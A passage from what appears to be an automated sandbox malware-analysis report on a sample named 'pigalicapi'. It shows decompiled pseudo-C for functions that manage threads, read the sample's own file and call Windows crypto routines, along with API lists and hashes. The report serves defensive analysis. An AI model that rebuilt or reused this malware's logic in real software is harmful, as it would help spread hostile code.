                                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE ref: 00410415
                                                                                                                                                                                                                                                                                                        • GetThreadPriority.KERNEL32 ref: 0041042C
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32 ref: 0041045E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: free.MSVCRT ref: 0041448D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1
                                                                                                                                                                                                                                                                                                        • abort.MSVCRT ref: 004104E4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Current$Thread$AtomCreateHandleMutexProcessValue$CloseDuplicateEventFindObjectPriorityReleaseSingleWaitabortfprintffreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1502871514-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
                                                                                                                                                                                                                                                                                                        • Instruction ID: 67e3bcb8228b950fd08ff0cec122396874fc9c7fbf7ab65224cae0d0026a9d18
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B51E8B0A04705DFD720EF69D54835ABBF0BB48304F40892EE99597351D7B8A489CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E4096() {
                                                                                                                                                                                                                                                                                                        				void _t92;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t161;
                                                                                                                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                                                                                                                        				void* _t166;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				L0:
                                                                                                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                                                                                                        					L0:
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                                                        					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                                                        						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                                                        					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					_t92 = CreateThread(0, 0, E024E4AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x64) = E024E97A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                                                        					E024E7D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                                                        					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                                                                                                        					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                                                        						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                                                        						E024E7D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                                                        						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                                                        						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                                        						_t114 = CreateThread(0, 0, E024E4BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                                                        						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                                                        						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                                        						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                                                                                                                        					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                                                        					E024E97C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                                                        					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						L21:
                                                                                                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					break;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L22:
                                                                                                                                                                                                                                                                                                        				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                                                                        0x024e4096
                                                                                                                                                                                                                                                                                                        0x024e4096
                                                                                                                                                                                                                                                                                                        0x024e4096
                                                                                                                                                                                                                                                                                                        0x024e409c
                                                                                                                                                                                                                                                                                                        0x024e40a5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e40ab
                                                                                                                                                                                                                                                                                                        0x024e40af
                                                                                                                                                                                                                                                                                                        0x024e40b9
                                                                                                                                                                                                                                                                                                        0x024e40c6
                                                                                                                                                                                                                                                                                                        0x024e40cc
                                                                                                                                                                                                                                                                                                        0x024e40d3
                                                                                                                                                                                                                                                                                                        0x024e40d3
                                                                                                                                                                                                                                                                                                        0x024e40da
                                                                                                                                                                                                                                                                                                        0x024e40de
                                                                                                                                                                                                                                                                                                        0x024e40e6
                                                                                                                                                                                                                                                                                                        0x024e40ec
                                                                                                                                                                                                                                                                                                        0x024e40ec
                                                                                                                                                                                                                                                                                                        0x024e40f7
                                                                                                                                                                                                                                                                                                        0x024e4101
                                                                                                                                                                                                                                                                                                        0x024e4118
                                                                                                                                                                                                                                                                                                        0x024e411e
                                                                                                                                                                                                                                                                                                        0x024e413d
                                                                                                                                                                                                                                                                                                        0x024e4143
                                                                                                                                                                                                                                                                                                        0x024e4153
                                                                                                                                                                                                                                                                                                        0x024e4158
                                                                                                                                                                                                                                                                                                        0x024e415b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e416d
                                                                                                                                                                                                                                                                                                        0x024e417f
                                                                                                                                                                                                                                                                                                        0x024e418e
                                                                                                                                                                                                                                                                                                        0x024e4193
                                                                                                                                                                                                                                                                                                        0x024e4199
                                                                                                                                                                                                                                                                                                        0x024e419f
                                                                                                                                                                                                                                                                                                        0x024e41a5
                                                                                                                                                                                                                                                                                                        0x024e41af
                                                                                                                                                                                                                                                                                                        0x024e41bb
                                                                                                                                                                                                                                                                                                        0x024e41d2
                                                                                                                                                                                                                                                                                                        0x024e41bd
                                                                                                                                                                                                                                                                                                        0x024e41c7
                                                                                                                                                                                                                                                                                                        0x024e41c7
                                                                                                                                                                                                                                                                                                        0x024e41e3
                                                                                                                                                                                                                                                                                                        0x024e41f7
                                                                                                                                                                                                                                                                                                        0x024e4203
                                                                                                                                                                                                                                                                                                        0x024e420c
                                                                                                                                                                                                                                                                                                        0x024e4216
                                                                                                                                                                                                                                                                                                        0x024e416a
                                                                                                                                                                                                                                                                                                        0x024e416a
                                                                                                                                                                                                                                                                                                        0x024e422d
                                                                                                                                                                                                                                                                                                        0x024e4242
                                                                                                                                                                                                                                                                                                        0x024e4249
                                                                                                                                                                                                                                                                                                        0x024e424b
                                                                                                                                                                                                                                                                                                        0x024e424b
                                                                                                                                                                                                                                                                                                        0x024e425e
                                                                                                                                                                                                                                                                                                        0x024e4265
                                                                                                                                                                                                                                                                                                        0x024e426d
                                                                                                                                                                                                                                                                                                        0x024e426d
                                                                                                                                                                                                                                                                                                        0x024e4273
                                                                                                                                                                                                                                                                                                        0x024e4277
                                                                                                                                                                                                                                                                                                        0x024e4281
                                                                                                                                                                                                                                                                                                        0x024e428e
                                                                                                                                                                                                                                                                                                        0x024e4294
                                                                                                                                                                                                                                                                                                        0x024e429b
                                                                                                                                                                                                                                                                                                        0x024e429b
                                                                                                                                                                                                                                                                                                        0x024e42a2
                                                                                                                                                                                                                                                                                                        0x024e42a6
                                                                                                                                                                                                                                                                                                        0x024e42af
                                                                                                                                                                                                                                                                                                        0x024e42b6
                                                                                                                                                                                                                                                                                                        0x024e42c4
                                                                                                                                                                                                                                                                                                        0x024e42c8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e42c8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e42c4
                                                                                                                                                                                                                                                                                                        0x024e42cd
                                                                                                                                                                                                                                                                                                        0x024e42d1
                                                                                                                                                                                                                                                                                                        0x024e42dd

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?), ref: 024E40AF
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E40C6
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 024E40E6
                                                                                                                                                                                                                                                                                                        • ResetEvent.KERNEL32(00000000), ref: 024E40F7
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 024E4101
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 024E4118
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E41DD
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 024E41F7
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 024E420C
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 024E4216
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?), ref: 024E42D1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 371823443-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6a06577cfc4b8724774d613e5b8d72df953c5c598b58251112c4e6d6b59030ce
                                                                                                                                                                                                                                                                                                        • Instruction ID: 85acc2d04e182e693dcd6db047a24370ce84ebf86c9cd3238b1d2a2b06560e74
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a06577cfc4b8724774d613e5b8d72df953c5c598b58251112c4e6d6b59030ce
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D51C5B5E40308EFEF18DF94D899BADBBB2BB48705F10451AF506AB280D770A950CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E4510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v780;
                                                                                                                                                                                                                                                                                                        				void* _v784;
                                                                                                                                                                                                                                                                                                        				char _v1308;
                                                                                                                                                                                                                                                                                                        				long _v1312;
                                                                                                                                                                                                                                                                                                        				void* _v1316;
                                                                                                                                                                                                                                                                                                        				long _v1320;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1324;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1328;
                                                                                                                                                                                                                                                                                                        				signed int _v1332;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1336;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1340;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1344;
                                                                                                                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                                                                                                                        				signed char _t101;
                                                                                                                                                                                                                                                                                                        				signed char _t114;
                                                                                                                                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					E024E7D20(E024E7D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                                                        					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                                                        					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                                                        					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v784 = _t90;
                                                                                                                                                                                                                                                                                                        					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                                                        					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                                                                                                                        						if(_v784 != 0) {
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v784);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v1316 = _t94;
                                                                                                                                                                                                                                                                                                        					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v1320 = 0;
                                                                                                                                                                                                                                                                                                        					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                                                        						L20:
                                                                                                                                                                                                                                                                                                        						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							_v1316 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                                                        						_v784 = 0;
                                                                                                                                                                                                                                                                                                        						_t101 = E024E47F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                                                        						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                                                        						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								_v1316 = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                                        							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                                        							_v1332 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                        								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                                                        								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                                                        									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v1340 = _v1344;
                                                                                                                                                                                                                                                                                                        								_t114 = E024E47F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                                                        								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                                                        								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v5 = 1;
                                                                                                                                                                                                                                                                                                        									goto L20;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                                                                        0x024e451a
                                                                                                                                                                                                                                                                                                        0x024e4522
                                                                                                                                                                                                                                                                                                        0x024e47e6
                                                                                                                                                                                                                                                                                                        0x024e47ed
                                                                                                                                                                                                                                                                                                        0x024e4532
                                                                                                                                                                                                                                                                                                        0x024e4556
                                                                                                                                                                                                                                                                                                        0x024e455b
                                                                                                                                                                                                                                                                                                        0x024e456c
                                                                                                                                                                                                                                                                                                        0x024e458b
                                                                                                                                                                                                                                                                                                        0x024e4591
                                                                                                                                                                                                                                                                                                        0x024e459e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e45b3
                                                                                                                                                                                                                                                                                                        0x024e45c0
                                                                                                                                                                                                                                                                                                        0x024e47d0
                                                                                                                                                                                                                                                                                                        0x024e47d7
                                                                                                                                                                                                                                                                                                        0x024e47e0
                                                                                                                                                                                                                                                                                                        0x024e47e0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e47d7
                                                                                                                                                                                                                                                                                                        0x024e45d6
                                                                                                                                                                                                                                                                                                        0x024e45dc
                                                                                                                                                                                                                                                                                                        0x024e45e9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e45ef
                                                                                                                                                                                                                                                                                                        0x024e4617
                                                                                                                                                                                                                                                                                                        0x024e461f
                                                                                                                                                                                                                                                                                                        0x024e47a9
                                                                                                                                                                                                                                                                                                        0x024e47b0
                                                                                                                                                                                                                                                                                                        0x024e47c0
                                                                                                                                                                                                                                                                                                        0x024e47c6
                                                                                                                                                                                                                                                                                                        0x024e47c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4637
                                                                                                                                                                                                                                                                                                        0x024e463e
                                                                                                                                                                                                                                                                                                        0x024e4644
                                                                                                                                                                                                                                                                                                        0x024e4660
                                                                                                                                                                                                                                                                                                        0x024e4665
                                                                                                                                                                                                                                                                                                        0x024e466d
                                                                                                                                                                                                                                                                                                        0x024e467f
                                                                                                                                                                                                                                                                                                        0x024e468f
                                                                                                                                                                                                                                                                                                        0x024e4695
                                                                                                                                                                                                                                                                                                        0x024e4695
                                                                                                                                                                                                                                                                                                        0x024e46a8
                                                                                                                                                                                                                                                                                                        0x024e46c2
                                                                                                                                                                                                                                                                                                        0x024e46c8
                                                                                                                                                                                                                                                                                                        0x024e46e3
                                                                                                                                                                                                                                                                                                        0x024e470f
                                                                                                                                                                                                                                                                                                        0x024e473b
                                                                                                                                                                                                                                                                                                        0x024e476b
                                                                                                                                                                                                                                                                                                        0x024e473d
                                                                                                                                                                                                                                                                                                        0x024e4750
                                                                                                                                                                                                                                                                                                        0x024e4750
                                                                                                                                                                                                                                                                                                        0x024e4777
                                                                                                                                                                                                                                                                                                        0x024e478f
                                                                                                                                                                                                                                                                                                        0x024e4794
                                                                                                                                                                                                                                                                                                        0x024e479c
                                                                                                                                                                                                                                                                                                        0x024e46dd
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e479e
                                                                                                                                                                                                                                                                                                        0x024e479e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e479e
                                                                                                                                                                                                                                                                                                        0x024e479c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e46e3
                                                                                                                                                                                                                                                                                                        0x024e466f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e466f
                                                                                                                                                                                                                                                                                                        0x024e461f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 024E456C
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E458B
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 024E45AD
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E45D6
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E4617
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E463E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E482A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: GetLastError.KERNEL32 ref: 024E4834
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E4850
